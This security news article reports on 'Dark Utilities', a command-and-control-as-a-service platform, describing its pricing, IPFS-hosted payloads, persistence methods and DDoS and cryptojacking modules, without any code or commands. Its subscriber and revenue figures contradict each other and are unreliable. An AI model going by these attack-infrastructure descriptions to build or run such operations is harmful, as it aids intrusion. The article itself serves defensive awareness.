Researchers have spotted a new service named Dark Utilities that offers an easy and less expensive way for cybercriminals to set up their own C2 center for performing malicious operations.

The Dark Utilities service

The Dark Utilities service offers attackers a platform that supports Linux, Windows, and Python-based payloads. The service removes the efforts of setting up the C2 communication channel.
  • The operation is a C2-as-a-service (C2aaS) that promotes a reliable, anonymous C2 center.
  • For now, the service, along with additional functions is being offered at the starting price of €999 ($1,021).
  • Currently, the service has 3,000 active subscribers, bringing the total revenue to about €30,000 ($30, 664).

Researchers suspect that this service has been created and is managed by someone using the persona Inplex-sys.

Platform architecture

The service, emerged in early 2022, offers C2 capabilities on both Tor and the Clear Web. 
  • It hosts payloads in a decentralized network system for saving and sharing data, Interplanetary File System (IPFS).
  • The platform supports multiple architectures. It seems that the operators are planning on expanding the list to offer a larger set of options for systems that could be targeted.
  • Further, the platform added support for ARMV71/ARM64 architectures, which are useful for targeting different embedded devices such as phones, IoTs, and routers.

Operational details

This subscription-based platform provides several feature options to its users while setting up their C2.
  • Selecting an OS generates a command string that attackers need to add into PowerShell or Bash scripts to enable the retrieval and execution of the payload on the targeted systems.
  • The selected payload can be used to establish persistence on the targeted system by creating a Registry key on Windows OS, by Crontab entry, or a Systemd service on Linux.
  • Additionally, the administrative panel of the platform comes with different modules for different types of attacks, such as DDoS and cryptojacking.

In addition, the operators have set up support communities on Discord and Telegram to provide technical help and support to their customers.


The availability of ready-to-use C2aaS offerings at such low prices allows adversaries to carry out attacks quickly without much hassles of setting up a command center. The Dark Utilities service has already amassed thousands of subscribers due to its low prices, and it is further expected to attract more adversaries. To keep up with such threats and combat them, it is essential to continuously review and enhance defense mechanisms.
Cyware Publisher